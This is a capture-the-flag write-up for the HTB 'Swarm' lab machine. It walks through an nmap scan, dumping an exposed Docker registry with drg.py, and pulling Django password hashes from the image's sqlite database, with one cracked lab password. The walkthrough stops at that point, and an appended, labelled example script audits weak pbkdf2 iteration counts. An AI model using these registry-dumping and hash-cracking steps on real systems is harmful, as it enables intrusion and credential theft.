
Swarm

Challenge

  • CTF: HTB Business CTF 2024: The Vault of Hope
  • Name: Swarm
  • Category: Fullpwn
  • Difficulty: Easy
  • Points: 725
  • Description: Embark on a Quest to fight the Swarm as you dive into the digital underbelly of the world’s media by infiltrating the formidable Newsbox agency. In an era where information is power, Newsbox has risen to the forefront, wielding an outsized influence on public opinion and political landscapes across the globe. Amidst the buzzing chaos of breaking news and ever-spinning narratives, your mission is to expose the hidden operations that sway the tides of information.

Writeup

Add site to /etc/hosts: swarm.htb

NMAP:

# Nmap 7.94SVN scan initiated Sat May 18 13:18:19 2024 as: /bin/nmap -n -sC -sV -v -p- --min-rate 3000 --stats-every 3m --max-retries 2 --max-scan-delay 20 --script-args "http.useragent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" -T4 -oA ./scans/20240518_131819_tcpall swarm.htb
Nmap scan report for swarm.htb (10.129.238.14)
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp   open  http    nginx 1.25.5
|_http-favicon: Unknown favicon MD5: 77C62F50E0A69C4AC72AE72239269561
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: nginx/1.25.5
|_http-title: Home - Simple News Portal
5000/tcp open  http    Docker Registry (API: 2.0)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 18 13:19:06 2024 -- 1 IP address (1 host up) scanned in 47.18 seconds


Docker Registry

python3 drg.py --dump_all -p 5000 http://swarm.htb
[+] newsbox-web
[+] BlobSum found 21
[+] Dumping newsbox-web

cd newsbox-web
for file in ./*; do tar -xvf "$file"; done
sqlite3 ./db.sqlite3 .dump

INSERT INTO auth_user VALUES(1,'pbkdf2_sha256$60$9jLMaflzyx1C3dAsBqZs8m$1H64ybyNv6NWUIw+TIaYE40VIW9enXe88teW5X+cQEI=','2024-04-30 16:32:56.994788',1,'admin','Administrator','[email protected]',1,1,'2022-04-06 01:44:10','Melo');
INSERT INTO auth_user VALUES(2,'pbkdf2_sha256$60$HXF8aUc1IWkR9ajH3y8LS8$d7MFlG+lVPC03n31bt4u6OvGs7z1hJpiUYp5eGHoAZM=','2022-04-06 08:16:01',0,'ChasingDeadlines','Loman','[email protected]',0,1,'2022-04-06 08:14:40','Chase');
INSERT INTO auth_user VALUES(3,'pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=',NULL,0,'PenniesForThoughts','Lessing','[email protected]',1,1,'2024-04-25 12:07:58','Penny');
PenniesForThoughts:pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=:pennypenny99
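
All three rows in the dump store pbkdf2_sha256 with only 60 iterations, so each password guess costs almost nothing to test. The following is an added example, not part of the original writeup or of Django itself: a small audit that parses Django's hash encoding and flags accounts below a minimum work factor. MIN_ITERATIONS and the function names are assumptions chosen for illustration.

```python
import base64
import hashlib
import hmac

MIN_ITERATIONS = 600_000  # assumed policy floor, not a value from the writeup

def parse_django_hash(encoded):
    """Split Django's 'algorithm$iterations$salt$base64(digest)' encoding."""
    algorithm, iterations, salt, digest = encoded.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError(f"unsupported algorithm: {algorithm}")
    return {"iterations": int(iterations), "salt": salt, "digest": digest}

def derive(password, salt, iterations):
    """PBKDF2-HMAC-SHA256 over the UTF-8 password and salt, base64-encoded."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return base64.b64encode(dk).decode("ascii")

def verify(password, encoded):
    """Recompute the digest with the stored salt and iteration count."""
    f = parse_django_hash(encoded)
    return hmac.compare_digest(derive(password, f["salt"], f["iterations"]), f["digest"])

def audit(rows, minimum=MIN_ITERATIONS):
    """Return (username, iterations) for every hash below the minimum work factor."""
    findings = []
    for username, encoded in rows:
        iterations = parse_django_hash(encoded)["iterations"]
        if iterations < minimum:
            findings.append((username, iterations))
    return findings

# (username, password) columns copied from the auth_user rows in the dump above.
ROWS = [
    ("admin", "pbkdf2_sha256$60$9jLMaflzyx1C3dAsBqZs8m$1H64ybyNv6NWUIw+TIaYE40VIW9enXe88teW5X+cQEI="),
    ("ChasingDeadlines", "pbkdf2_sha256$60$HXF8aUc1IWkR9ajH3y8LS8$d7MFlG+lVPC03n31bt4u6OvGs7z1hJpiUYp5eGHoAZM="),
    ("PenniesForThoughts", "pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg="),
]

if __name__ == "__main__":
    for user, iterations in audit(ROWS):
        print(f"{user}: {iterations} iterations, {MIN_ITERATIONS // iterations}x under the floor")
```

Run against a production auth_user table, any finding means those accounts need their hashes upgraded at the next login or a forced password reset.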